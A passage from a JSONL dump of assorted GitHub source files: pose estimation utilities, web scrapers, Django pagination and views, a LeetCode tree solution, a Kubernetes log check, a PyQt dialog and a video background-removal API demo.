pinocchio.utils import *\n\n\ndef load_object_2d_endpoints(\n path_object_2d_endpoints,\n frame_start,\n frame_end,\n path_scores=None):\n '''\n Load object 2D endpoints from the user-provided path.\n This function return a (6, nf) matrix, i.e. (x, y, confidence) * 2 endpoints = 6\n '''\n # npts: number of keypoints in the txt file. By default we consider 2 keypoints at each video frame: the first point as the head of the object and the second as the end of the bar.\n\n npts = 2\n with open(path_object_2d_endpoints, 'r') as f:\n data = np.loadtxt(f)\n if data.shape[0] > 0:\n fids = data[::npts,0].astype(int)\n endPts = np.zeros((fids.shape[0], 0)).astype(int)\n # In Jiri's raw output, the 1st endpoint is red, the 2nd is green\n for n in range(npts):\n endPts = np.concatenate((endPts, data[n::npts,1:]), axis=1)\n else:\n fids = []\n endPts = np.array([])\n\n\n # Load scores\n if path_scores is not None:\n with open(path_scores, 'r') as f:\n data = np.loadtxt(f)\n # fids_check = data_scores[:,0].astype(int)\n scores = data[:,1]\n nf = scores.shape[0]\n\n # parse the endPts and scores to a (6, nf) matrix\n endpoint_2d_positions = np.zeros((nf, 6))\n for i in range(len(fids)):\n fid = fids[i]\n endpoints = endPts[i]\n # get the correct order of the endpoints\n handle_end = 2\n head = 0\n # our Pinocchio object model assume index 0 as the end of handle and 1 as the object's head\n endpoint_2d_positions[fid,:2] = endpoints[handle_end:(handle_end+2)]\n endpoint_2d_positions[fid,3:5] = endpoints[head:(head+2)]\n\n if path_scores is not None:\n score = scores[fid]\n else:\n score = 1.\n\n endpoint_2d_positions[fid,2] = score\n endpoint_2d_positions[fid,5] = score\n\n endpoint_2d_positions = np.matrix(endpoint_2d_positions).T\n endpoint_2d_positions = endpoint_2d_positions[:, (frame_start-1):frame_end] # verbose\n\n return endpoint_2d_positions\n\ndef compute_object_config_initial_guesses(\n object_model,\n object_data,\n object_loader,\n person_loader,\n object_init_rotation_candidates=None):\n '''\n Generate a set of initial guesses for the object configurations\n '''\n person_joint_3d_positions = person_loader.joint_3d_positions_\n config_object_initial_guesses = []\n\n nf = person_joint_3d_positions.shape[1]\n object_init_positions = (person_joint_3d_positions[18*3:(18*3+3),:] + person_joint_3d_positions[23*3:(23*3+3),:])/2.# initialize object translation with hand positions\n\n if object_init_rotation_candidates is None:\n object_init_rotation_candidates = [[0., 1e-1, 0.],\n [0., np.pi/2., 0.],\n [0., np.pi, 0.],\n [0., -np.pi/2., 0.]]\n\n for rot in object_init_rotation_candidates:\n object_init_rotations_tiled = np.tile(np.matrix(rot).T, (1, nf))\n config_object_guess = np.concatenate(\n (object_init_positions, object_init_rotations_tiled), axis=0)\n\n # Refine config_object_guess for barbell sequences, such that the center\n # of the stick handle (where the contact points are initialized), lies\n # in the center of the person's hand positions for each frame\n if object_loader.name_ == \"barbell\":\n object_loader.LoadConfig(config_object_guess, object_loader.fps_)\n nq_pino = object_loader.nq_pino_\n nq_contact = object_loader.nq_contact_\n nq_keypoints = object_loader.nq_keypoints_\n nq_stacked = nq_pino + nq_keypoints + nq_contact\n config_stacked = np.matrix(np.zeros((nq_stacked, nf)))\n config_stacked[:nq_pino,:] = object_loader.config_pino_.copy()\n config_stacked[nq_pino:(nq_pino+nq_contact),:] = object_loader.config_contact_.copy()\n\n num_contacts = object_loader.num_contacts_\n for i in range(nf):\n # Compute the centroid position of the object contact points\n pin.forwardKinematics(object_model, object_data, config_stacked[:,i])\n centroid_object_contacts = zero(3)\n for k in range(num_contacts):\n centroid_object_contacts += object_data.oMi[object_loader.njoints_+1+k].translation\n centroid_object_contacts /= num_contacts\n # Offset the object translation by the difference between the centroid\n # and the center of the person's hands\n offset = config_object_guess[:3,i] - centroid_object_contacts\n config_object_guess[:3,i] += offset\n\n config_object_initial_guesses.append(config_object_guess)\n\n return config_object_initial_guesses\n\n\ndef LoadObject2dEndpoints(video_name, npts=2):\n '''\n load object 2D endpoints and confidence values\n return a (6, nf) matrix, i.e. (x, y, confidence) * 2 endpoints = 6\n --\n npts: number of keypoints in the txt file. By default we consider 2 keypoints at each video frame: the first point as the head of the object and the second as the end of the bar.\n '''\n if 'hammer' in video_name:\n endpts_path = join('object_detect', 'endpoints_corrected', video_name+'_endpoints_corrected.txt')\n else:\n endpts_path = join('object_detect', 'endpoints', video_name+'_endpoints.txt')\n scores_path = join('object_detect', 'scores', video_name+'_scores.txt')\n # load endpoints\n with open(endpts_path, 'r') as f:\n data_endpts = np.loadtxt(f)\n #print data_endpts.shape\n if data_endpts.shape[0] > 0:\n fids = data_endpts[::npts,0].astype(int)\n endPts = np.zeros((fids.shape[0], 0)).astype(int)\n for n in range(npts):\n endPts = np.concatenate((endPts, data_endpts[n::npts,1:]), axis=1)\n else:\n fids = []\n endPts = np.array([])\n # load confidence values\n with open(scores_path, 'r') as f:\n data_scores = np.loadtxt(f)\n # fids_check = data_scores[:,0].astype(int)\n scores = data_scores[:,1]\n nf = scores.shape[0]\n\n # correct the order of object endpoints.\n # NOTE: In Jiri's raw output, the 1st endpoint is red, the 2nd is green\n # barbell: 0 - right point, 1 - left point\n # scythe: 0 - handle end, 1 - head\n # spade: 0 - head, 1 - handle end\n # hammer: it dependes on the video\n endpoint_orders = {\n \"barbell_0002\": (0, 2),\n \"barbell_0003\": (0, 2),\n \"barbell_0007\": (0, 2),\n \"barbell_0008\": (0, 2),\n \"barbell_0010\": (0, 2),\n \"hammer_0001\": (0, 2),\n \"hammer_0003\": (0, 2),\n \"hammer_0006\": (2, 0),\n \"hammer_0007\": (2, 0),\n \"hammer_0010\": (0, 2),\n \"scythe_0001\": (0, 2),\n \"scythe_0002\": (0, 2),\n \"scythe_0003\": (0, 2),\n \"scythe_0005\": (0, 2),\n \"scythe_0006\": (0, 2),\n \"spade_0001\": (2,0),\n \"spade_0002\": (2,0),\n \"spade_0003\": (2,0),\n \"spade_0007\": (2,0),\n \"spade_0008\": (2,0)\n }\n\n # parse the endPts and scores to a (6, nf) matrix\n endpoint_2d_positions = np.zeros((nf, 6))\n for i in range(len(fids)):\n fid = fids[i]\n endpoints = endPts[i]\n # get the correct order of the endpoints\n handle_end = endpoint_orders[video_name][0]\n head = endpoint_orders[video_name][1]\n # our Pinocchio object model assume index 0 as the end of handle and 1 as the object's head\n endpoint_2d_positions[fid,:2] = endpoints[handle_end:(handle_end+2)]\n endpoint_2d_positions[fid,2] = scores[fid]\n endpoint_2d_positions[fid,3:5] = endpoints[head:(head+2)]\n endpoint_2d_positions[fid,5] = scores[fid]\n\n return np.matrix(endpoint_2d_positions).T\n\n\ndef estimate_object_handle_length(\n tool_name,\n joint_2d_positions,\n openpose_keypoints_neutral_pose,\n endpoint_2d_positions,\n ratio=.8):\n '''\n Estimate the object handle's 3D length accoring to its relative 2D length w.r.t. the person's torso size estimated by Openpose.\n The main steps include:\n 1. Compute the person's average torso length (in 2D).\n 2. Compute the average 2D length of the object.\n 3. Compute the relative length of the object handle w.r.t. the person's torso in 2D.\n 4. The 3D object length is obtained from the relative length and the person's 3D torso length (output by HMR).\n If there's no object 2D endpoint is detected, we use fixed scales for different types of objects\n '''\n\n # Estimate torso 2D length\n # Compute 2D lengths of (detected) torso links frame by frame,\n # and stack the results to the list torso_links_2d_len. The estimated\n # torso 2D length is finally obtained by averaging torso_links_2d_len.\n torso_link_ids = [[5,8], # l_shoulder, r_hip\n [2,11]] # r_shoulder, l_hip\n\n joint_2d_positions = joint_2d_positions.T.getA().reshape((-1,18,3))\n nf = joint_2d_positions.shape[0]\n\n torso_links_2d_lengths = []\n for i in range(nf):\n # Iterate over torso links\n for l,joint_ids in enumerate(torso_link_ids):\n # For link #l, make sure the joints are detected\n link_exists = True\n for j in joint_ids:\n confidence = joint_2d_positions[i,j,-1]\n if confidence <= .05:\n link_exists = False\n break\n\n if link_exists:\n joint_1 = joint_2d_positions[i,joint_ids[0],:2]\n joint_2 = joint_2d_positions[i,joint_ids[1],:2]\n torso_links_2d_lengths.append(LA.norm(joint_1-joint_2))\n\n # Sort per-frame torso lengths in descending order\n torso_links_2d_lengths = sorted(torso_links_2d_lengths, reverse=True)\n # Compute average 2D torso length using a propotion (determined by ratio)\n # of the per-frame results.\n nf_detected = len(torso_links_2d_lengths)\n nf_effective = int(ratio*nf_detected)\n nf_start = (nf_detected-nf_effective)/2\n nf_end = min(nf_start+nf_effective, nf_detected)\n torso_2d_len = np.mean(torso_links_2d_lengths[nf_start:nf_end])\n\n # Compute torso 3D length\n torso_links_3d_len = [None] * 2\n for l,joint_ids in enumerate(torso_link_ids):\n joint_1 = openpose_keypoints_neutral_pose[joint_ids[0],:3]\n joint_2 = openpose_keypoints_neutral_pose[joint_ids[1],:3]\n torso_links_3d_len[l] = LA.norm(joint_1-joint_2)\n\n torso_3d_len = np.mean(np.array(torso_links_3d_len))\n\n # Estimate object handle 2D length using\n endpoint_2d_positions = endpoint_2d_positions.T.getA().reshape((-1,2,3))\n if not endpoint_2d_positions.shape[0]==nf:\n print(\"Check failed: endpoint_2d_positions.shape[0]==nf ({0:d} vs {1:d})\".format(endpoint_2d_positions.shape[0], nf))\n\n handle_2d_lengths = []\n for i in range(nf):\n # Compute handle lengths for frames with detected endpoints\n object_detected = True\n for k in range(2):\n confidence = endpoint_2d_positions[i,k,-1]\n if confidence <= .05:\n object_detected = False\n break\n\n if object_detected:\n handle_end_pos = endpoint_2d_positions[i,0,:2]\n tool_head_pos = endpoint_2d_positions[i,1,:2]\n handle_2d_lengths.append(LA.norm(handle_end_pos-tool_head_pos))\n\n nf_detected = len(handle_2d_lengths)\n if nf_detected > 0:\n # Sort per-frame handle lengths in descending order\n handle_2d_lengths = sorted(handle_2d_lengths, reverse=True)\n # Compute average 2D handle length using a propotion (determined by ratio)\n # of the per-frame results.\n nf_effective = int(ratio*nf_detected)\n nf_start = (nf_detected-nf_effective)/2\n nf_end = min(nf_start+nf_effective, nf_detected)\n handle_2d_len = np.mean(handle_2d_lengths[nf_start:nf_end])\n scale = handle_2d_len/torso_2d_len\n else:\n # Maunally set scale if no object is detected at any time\n if tool_name == \"hammer\":\n scale = 1.\n elif tool_name == \"scythe\":\n scale = 1.\n elif tool_name == \"spade\":\n scale = 1.\n elif tool_name == \"barbell\":\n scale = 3.7 # 4.6, 4.65, 2.63, 2.93\n else:\n raise ValueError(\"Unknown tool name: {0:s}!\".format(tool_name))\n print(\"(object_pose.py) No object is detected, use default scale for estimating object 3D length ...\")\n handle_2d_len = 0.\n\n # Compute 3D handle length using similar triangles\n handle_3d_len = torso_3d_len*scale\n\n # Print info\n print(\"(object_pose.py) Estimated {0:s} length:\".format(tool_name))\n print(\" torso_2d_len: {0:.2f} (pixels)\".format(torso_2d_len))\n print(\" handle_2d_len: {0:.2f} (pixels)\".format(handle_2d_len))\n print(\" torso_3d_len: {0:.2f} (m)\".format(torso_3d_len))\n print(\" Output handle_3d_len: {0:.2f} (m) (with scale {1:.2f})\".format(handle_3d_len, scale))\n\n return handle_3d_len\n","repo_name":"zongmianli/Estimating-3D-Motion-Forces","sub_path":"lib/object_pose.py","file_name":"object_pose.py","file_ext":"py","file_size_in_byte":13437,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"78"} +{"seq_id":"29159674678","text":"# -*- coding: utf-8 -*-\nimport datetime\nimport json\nimport logging\nimport time\nimport requests\nimport scrapy\nfrom scrapy import Request\n\nfrom ..items import MaoyanRequestItem\n\n\nclass MaoyanmoviehotSpider(scrapy.Spider):\n name = 'maoyanMovieHot'\n allowed_domains = ['maoyan.com']\n # start_urls = ['http://maoyan.com/']\n\n def __init__(self, *args, **kwargs):\n super(MaoyanmoviehotSpider, self).__init__(*args, **kwargs)\n self.movie_url = 'http://api.maoyan.com/mmdb/movie/v5/{}.json'\n # 城市默认设为广州\n self.hot_movie = 'http://api.maoyan.com/mmdb/movie/v4/list/hot.json?ci=20'\n\n def get_hotMovie(self):\n hot_movie = 'http://api.maoyan.com/mmdb/movie/v4/list/hot.json?ci=20'\n res = requests.get(hot_movie)\n data = json.loads(res.text)\n # 获取所有热门电影id\n movieIds = data.get('data').get('movieIds')\n return movieIds\n\n def start_requests(self):\n movieIds = self.get_hotMovie()\n for movie in movieIds:\n yield Request(self.movie_url.format(str(movie)), callback=self.parse_movie)\n\n # 电影基本信息解析,并构建影评请求\n\n def parse_movie(self, response):\n req = MaoyanRequestItem()\n # 初始化获得本地时间\n req_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))\n try:\n # 将返回数据loads成字典\n items = json.loads(response.text).get('data').get('movie')\n if req_time > items['rt']:\n req['movie_id'] = items['id']\n req['movie_name'] = items['nm']\n req['request_date'] = datetime.datetime.now()\n req['create_date'] = datetime.datetime.now()\n if '中国' in items['src']:\n req['region'] = 'china'\n else:\n req['region'] = 'foreign'\n yield req\n except Exception as e:\n logging.error(e)\n\n","repo_name":"jaydenjd/film-spider","sub_path":"gerapy/projects/film_crawl/film_crawl/spiders/maoyanMovieHot.py","file_name":"maoyanMovieHot.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"4033492890","text":"from collections import OrderedDict\n\nfrom rest_framework.pagination import LimitOffsetPagination as _LimitOffsetPagination\nfrom rest_framework.response import Response\n\n\ndef get_paginated_response(*, pagination_class, serializer_class, queryset, request, view):\n paginator = pagination_class()\n\n page = paginator.paginate_queryset(queryset, request, view=view)\n\n if page is not None:\n serializer = serializer_class(page, many=True)\n return paginator.get_paginated_response(serializer.data)\n\n serializer = serializer_class(queryset, many=True)\n\n return Response(data=serializer.data)\n\n\nclass LimitOffsetPagination(_LimitOffsetPagination):\n default_limit = 10\n max_limit = 50\n\n def get_paginated_data(self, data):\n return OrderedDict(\n [\n (\"limit\", self.limit),\n (\"offset\", self.offset),\n (\"count\", self.count),\n (\"next\", self.get_next_link()),\n (\"previous\", self.get_previous_link()),\n (\"results\", data),\n ]\n )\n\n def get_paginated_response(self, data):\n \"\"\"\n We redefine this method in order to return `limit` and `offset`.\n This is used by the frontend to construct the pagination itself.\n \"\"\"\n return Response(\n OrderedDict(\n [\n (\"limit\", self.limit),\n (\"offset\", self.offset),\n (\"count\", self.count),\n (\"next\", self.get_next_link()),\n (\"previous\", self.get_previous_link()),\n (\"results\", data),\n ]\n )\n )\n","repo_name":"HackSoftware/Django-Styleguide-Example","sub_path":"styleguide_example/api/pagination.py","file_name":"pagination.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","stars":511,"dataset":"github-code","pt":"78"} +{"seq_id":"22962624772","text":"\"\"\"\nhttps://leetcode.com/problems/sum-of-root-to-leaf-binary-numbers/\n\nYou are given the root of a binary tree where each \nnode has a value 0 or 1. Each root-to-leaf path \nrepresents a binary number starting with the most \nsignificant bit.\n\nFor example, if the path is 0 -> 1 -> 1 -> 0 -> 1, \nthen this could represent 01101 in binary, which is 13.\nFor all leaves in the tree, consider the numbers \nrepresented by the path from the root to that leaf. \nReturn the sum of these numbers.\n\nThe test cases are generated so that the answer fits \nin a 32-bits integer.\n\nExample 1:\nInput: root = [1,0,1,0,1,0,1]\nOutput: 22\nExplanation: (100) + (101) + (110) + (111) = 4 + 5 + 6 + 7 = 22\n\nExample 2:\nInput: root = [0]\nOutput: 0\n\nConstraints:\nThe number of nodes in the tree is in the range [1, 1000].\nNode.val is 0 or 1.\n\"\"\"\nfrom collections import deque\nimport sys\n\nsys.path.insert(1, \"./\")\n\nfrom tree_node import (\n TreeNode,\n list_traversal_to_bt,\n print_tree,\n)\n\n\ndef dfs_recursion(root: TreeNode) -> int:\n # Depth First Search - Recursion\n # Time complexity: O(n)\n # Space complexity: O(h)\n\n def dfs(node: TreeNode, curr_val: int) -> int:\n # Base case: not a node, and the previous\n # node was not a leaf (only one child),\n # so don't take it into account for the total sum\n if not node:\n return 0\n\n # Update the passed current value\n # curr_val = curr_val << 1 | node.val\n curr_val = curr_val * 2 + node.data\n\n # If the current `node` is a leaf,\n # return `curr_value`\n # (which includes the update with the current `node`)\n if not node.left and not node.right:\n return curr_val\n\n # Continue exploring both branches\n return dfs(node.left, curr_val) + dfs(node.right, curr_val)\n\n return dfs(root, 0)\n\n\ndef dfs_iterative(root: TreeNode) -> int:\n # Depth First Search - Iterative\n # Time complexity: O(n)\n # Space complexity: O(h)\n\n res = 0\n # Explore the nodes of the tree using a stack\n # of tuples: (current_value, node)\n stack = deque([(root.data, root)])\n while stack:\n curr_val, node = stack.pop()\n\n if not node.left and not node.right:\n # If leaf node, add the number to the total sum\n res += curr_val\n\n # Update the current value\n curr_val <<= 1\n\n if node.left:\n stack.append((curr_val | node.left.data, node.left))\n\n if node.right:\n stack.append((curr_val | node.right.data, node.right))\n\n return res\n\n\ndef dfs_iterative2(root: TreeNode) -> int:\n # Depth First Search - Iterative\n # Time complexity: O(n)\n # Space complexity: O(h)\n\n res = 0\n # Explore the nodes of the tree using a stack\n # of tuples: (current_value, node)\n stack = deque([(0, root)])\n while stack:\n curr_val, node = stack.pop()\n\n # Update the current sum with the current node\n # curr_val = curr_val << 1 | node.data\n curr_val = curr_val * 2 + node.data\n\n if not node.left and not node.right:\n # If leaf node, add the number to the total sum\n res += curr_val\n\n if node.left:\n stack.append((curr_val, node.left))\n\n if node.right:\n stack.append((curr_val, node.right))\n\n return res\n\n\nif __name__ == \"__main__\":\n print(\"-\" * 60)\n print(\"Sum of root to leaf binary numbers\")\n print(\"-\" * 60)\n\n test_cases = [\n ([0], 0),\n ([1], 1),\n ([1, 0], 2),\n ([1, 0, 0], 4),\n ([1, 0, 1], 5),\n ([1, 0, 1, 0, 1, 0, 1], 22),\n ]\n\n for nums, solution in test_cases:\n\n root = list_traversal_to_bt(nums)\n print(\"Binary Tree:\")\n print_tree(root)\n\n result = dfs_recursion(root)\n output = f\" dfs_recursion = \"\n output += \" \" * (10 - len(output))\n test_ok = solution == result\n output += str(result)\n output += \" \" * (45 - len(output))\n output += f'\\t\\tTest: {\"OK\" if test_ok else \"NOT OK\"}'\n print(output)\n\n result = dfs_iterative(root)\n output = f\" dfs_iterative = \"\n output += \" \" * (10 - len(output))\n test_ok = solution == result\n output += str(result)\n output += \" \" * (45 - len(output))\n output += f'\\t\\tTest: {\"OK\" if test_ok else \"NOT OK\"}'\n print(output)\n\n result = dfs_iterative2(root)\n output = f\" dfs_iterative2 = \"\n output += \" \" * (10 - len(output))\n test_ok = solution == result\n output += str(result)\n output += \" \" * (45 - len(output))\n output += f'\\t\\tTest: {\"OK\" if test_ok else \"NOT OK\"}'\n print(output)\n\n print()\n","repo_name":"daalgi/algorithms","sub_path":"trees/sum_root_to_leaf_bin.py","file_name":"sum_root_to_leaf_bin.py","file_ext":"py","file_size_in_byte":4709,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"2863493667","text":"import re\n\nfrom fossor.checks.check import Check\n\nclass CellStyleExceed(Check):\n def run(self, variables):\n out, err, return_code = self.shell_call('kubectl get pods')\n log_since = variables.get('log_since', None)\n pods = out.splitlines()[1:]\n serverLine = [pod for pod in pods if \"guandata-server\" in pod and \"Running\" in pod][0]\n serverPod = serverLine.split()[0]\n\n if (log_since):\n out, err, return_code = self.shell_call('kubectl logs --since=%s %s' % (log_since, serverPod))\n if (err):\n return err\n else:\n out, err, return_code = self.shell_call('kubectl logs --since=24h %s' % (serverPod))\n\n pattern = re.compile(r'(.*?)The maximum number of Cell Styles was exceeded. You can define up to 64000 style in a .xlsx Workbook(.*)', re.S|re.I)\n matchResult = re.match(pattern, ''.join(out))\n if matchResult != None:\n return \"可能是已知问题, 客户导出的cellStyle超过64000, 可参考Task-T5239\"\n return \"暂无该问题\"\n\nif __name__ == '__main__':\n c = CellStyleExceed()\n print(c.run({}))","repo_name":"Kaleidoscoper/fossor","sub_path":"fossor/checks/LogCheck/CellStyleExceed.py","file_name":"CellStyleExceed.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"34968124356","text":"from django.shortcuts import render,redirect\nfrom django.http import HttpResponse\nfrom django.views.generic import TemplateView\nfrom django.http import JsonResponse\nfrom rura.models import ICT,InternationalInternetBandwidth,VoiceTraffic\nfrom datetime import datetime\n# Create your views here.\nclass HomePageView(TemplateView):\n template_name = \"home.html\"\n def getICTReport(self,request):\n #def get(self):\n ict = ICT.objects.all()\n vt =VoiceTraffic.objects.all()\n args ={'ict':ict,'vt':vt}\n return render(self.template_name,args)\n \ndef homePageView(request):\n template_name = \"home.html\"\n icts = ICT.objects.all()\n vt =VoiceTraffic.objects.all()\n args ={'icts':icts,'vts':vt}\n\n return render(request, template_name,args)\n\ndef getBarChatData(request):\n template_name = \"home.html\"\n ict = ICT.objects.all()\n vt =VoiceTraffic.objects.all()\n iternationalIB = InternationalInternetBandwidth.objects.all()\n dt = {\n \"data\":[len(ict),len(vt),len(iternationalIB)],\n \"labels\":[\"ICT \",\"voice Traffic\",\"Intl Bandwidth\"]\n }\n return JsonResponse(dt)\n\ndef getICT(request):\n icts = ICT.objects.all()\n vals= []\n labs =[]\n for ict in icts: \n vals.append(ict.prepaid)\n labs.append(datetime.date(ict.date_paid))\n \n dt={\n \"data\":vals,\n \"labels\":labs\n }\n return JsonResponse(dt)","repo_name":"pius-ng3a/rura","sub_path":"rura/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42431236214","text":"import requests\nfrom requests.compat import quote_plus\nfrom bs4 import BeautifulSoup\nfrom django.shortcuts import render\nfrom . import models\nfrom django.utils import timezone\n\nBASE_CRAIGLIST = 'https://sfbay.craigslist.org/search/bbb?query={}'\nBASSE_IMG_URL = 'https://images.craigslist.org/{}_300x300.jpg'\n\n# Create your views here.\ndef home(request):\n return render(request, 'base.html')\n\n\ndef new_search(request):\n search = request.POST.get('search')\n\n if search == None or len(search) == 0:\n \treturn render(request, 'myapp/new_search.html')\n\n create_search(search)\n\n final_url = BASE_CRAIGLIST.format(quote_plus(search))\n responce = requests.get(final_url)\n\n soup = BeautifulSoup(responce.text, features='html.parser')\n\n posts_list = soup.find_all('li', {'class' : 'result-row'})\n final_post = []\n\n for post in posts_list:\n \tpost_title = post.find(class_='result-title').text\n \tpost_url = post.find('a').get('href')\n\n \tpost_img_id = ''\n \tpost_img_url = ''\n\n \tif post.find(class_='result-image').get('data-ids'):\n \t\tpost_img_id = post.find(class_='result-image').get('data-ids').split(',')[0].split(':')[1]\n \t\tpost_img_url = BASSE_IMG_URL.format(post_img_id)\n\n \tfinal_post.append((post_title, post_url, post_img_url))\n\n stuff_for_frontend = {\n \t'search': search,\n \t'final_post': final_post,\n \t}\n return render(request, 'myapp/new_search.html', stuff_for_frontend)\n\ndef create_search(search):\n\tmodels.Search.objects.create(search=search, created=timezone.now())","repo_name":"aleksandr254/myapp","sub_path":"myapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74906711931","text":"import csv\nimport torch\nimport argparse\nimport pandas as pd\nimport webdataset as wds\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\n \"-p\",\n \"--dataset_path\",\n type=str,\n help=\"Path to the directory of the dataset in the format: e.g: http://storage.googleapis.com/nvdata-openimages/openimages-train-{000000..000554}.tar\"\n)\n\nparser.add_argument(\n \"-n\",\n \"--dataset_name\",\n type=str\n)\n\nargs = parser.parse_args()\n\ndataset = wds.WebDataset(args.dataset_path)\ndataloader = torch.utils.data.DataLoader(dataset, num_workers=4, batch_size=1)\n\nwith open(args.dataset_name+'.tsv', 'w',encoding='UTF8') as f:\n print(':)')\n writer = csv.writer(f,delimiter='\\t')\n for data in dataloader:\n writer.writerow([data['caption_reference_description.txt'][0].decode(\"utf-8\"),data['image_url.txt'][0].decode(\"utf-8\")])\n","repo_name":"hiaac-nlp/CAPIVARA","sub_path":"preprocessing/dataset_to_tsv.py","file_name":"dataset_to_tsv.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"78"} +{"seq_id":"23161399634","text":"# -*- coding: utf-8 -*-\n# This file is part of Acca plugin.\n\n# Acca plugin is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n\n# Acca plugin is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n\n# You should have received a copy of the GNU General Public License\n# along with Acca plugin. If not, see .\n\n\n# Form implementation generated from reading ui file 'progress_form.ui'\n#\n# Created: Fri Apr 27 19:11:35 2012\n# by: PyQt4 UI code generator 4.7.3\n#\n# WARNING! All changes made in this file will be lost!\n\nfrom PyQt4 import QtCore, QtGui\n\nclass Ui_progress_dialog(object):\n def setupUi(self, progress_dialog):\n progress_dialog.setObjectName(\"progress_dialog\")\n progress_dialog.resize(520, 98)\n self.verticalLayoutWidget = QtGui.QWidget(progress_dialog)\n self.verticalLayoutWidget.setGeometry(QtCore.QRect(10, 10, 501, 81))\n self.verticalLayoutWidget.setObjectName(\"verticalLayoutWidget\")\n self.verticalLayout = QtGui.QVBoxLayout(self.verticalLayoutWidget)\n self.verticalLayout.setObjectName(\"verticalLayout\")\n self.gridLayout = QtGui.QGridLayout()\n self.gridLayout.setObjectName(\"gridLayout\")\n self.lblStatus = QtGui.QLabel(self.verticalLayoutWidget)\n sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Preferred, QtGui.QSizePolicy.Maximum)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.lblStatus.sizePolicy().hasHeightForWidth())\n self.lblStatus.setSizePolicy(sizePolicy)\n self.lblStatus.setAlignment(QtCore.Qt.AlignCenter)\n self.lblStatus.setObjectName(\"lblStatus\")\n self.gridLayout.addWidget(self.lblStatus, 0, 1, 1, 1)\n self.prBar = QtGui.QProgressBar(self.verticalLayoutWidget)\n self.prBar.setProperty(\"value\", 0)\n self.prBar.setObjectName(\"prBar\")\n self.gridLayout.addWidget(self.prBar, 1, 0, 1, 3)\n self.verticalLayout.addLayout(self.gridLayout)\n\n self.retranslateUi(progress_dialog)\n QtCore.QMetaObject.connectSlotsByName(progress_dialog)\n\n def retranslateUi(self, progress_dialog):\n progress_dialog.setWindowTitle(QtGui.QApplication.translate(\"progress_dialog\", \"Progress\", None, QtGui.QApplication.UnicodeUTF8))\n self.lblStatus.setText(QtGui.QApplication.translate(\"progress_dialog\", \"Progress\", None, QtGui.QApplication.UnicodeUTF8))\n\n","repo_name":"bastrakov-sergei/Acca_Plugin","sub_path":"progress_form.py","file_name":"progress_form.py","file_ext":"py","file_size_in_byte":2826,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"12152558561","text":"import requests\nimport os\nimport mimetypes\n\nAPI_KEY = os.getenv('BGREM_KEY')\nURL = 'https://bgrem.deelvin.com/api/v1'\n\ndef upload_videos(fp, back_id=None):\n action = 'videos'\n with open(fp, \"rb\") as f:\n files = {\"file\": (os.path.basename(fp), f, mimetypes.MimeTypes().guess_type(fp)[0])}\n headers = {'Authorization': f'Bearer {API_KEY}'}\n data = {\n 'background_id': back_id,\n }\n r = requests.post(f'{URL}/{action}', headers=headers, files=files, data=data)\n return r.json()['id']\n\n\ndef get_video_by_id(id):\n action = 'videos'\n r = requests.get(f'{URL}/{action}/{id}', headers={'Authorization': f'Bearer {API_KEY}'})\n return r.json()\n\n\ndef delete_video_by_id(id):\n action = 'videos'\n r = requests.delete(f'{URL}/{action}/{id}', headers={'Authorization': f'Bearer {API_KEY}'})\n return print(r.json())\n\n\ndef main():\n result_id = upload_videos('./john.mp4', back_id='8da750a2-1bf6-4867-bd16-81e16de710dd')\n status = ''\n while status != 'done':\n status = get_video_by_id(result_id)['status']\n if status == 'error':\n print('There was error while working with file!')\n return\n print(f'Result url is: {get_video_by_id(result_id)[\"result_url\"]}')\n delete_video_by_id(result_id)\n return\n\n\nif __name__ == '__main__':\n main()\n\n\n","repo_name":"EkaterinaT89/BgRem-1","sub_path":"API_demo/demo_proj/john_lost.py","file_name":"john_lost.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"20673741560","text":"from __future__ import annotations\n\nimport csv\nimport itertools\nimport json\nfrom typing import Any, Dict, get_args\n\nfrom django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin\nfrom django.http.response import HttpResponse\nfrom django.shortcuts import get_object_or_404\nfrom django.views.generic import View\n\nfrom vdgsa_backend.conclave_registration.models import (\n AdditionalRegistrationInfo, ConclaveRegistrationConfig, Housing, Period, RegistrationEntry,\n WorkStudyApplication, YesNo\n)\nfrom vdgsa_backend.conclave_registration.summary_and_charges import (\n CHARGE_CSV_LABELS, get_charges_summary\n)\n\nfrom .permissions import is_conclave_team\n\n\nclass DownloadRegistrationEntriesCSVView(LoginRequiredMixin, UserPassesTestMixin, View):\n def get(self, *args: Any, **kwargs: Any) -> HttpResponse:\n return make_reg_csv(\n get_object_or_404(ConclaveRegistrationConfig, pk=self.kwargs['conclave_config_pk'])\n )\n\n def test_func(self) -> bool:\n return is_conclave_team(self.request.user)\n\n\ndef make_reg_csv(conclave_config: ConclaveRegistrationConfig) -> HttpResponse:\n response = HttpResponse(content_type='text/csv')\n response['Content-Disposition'] = 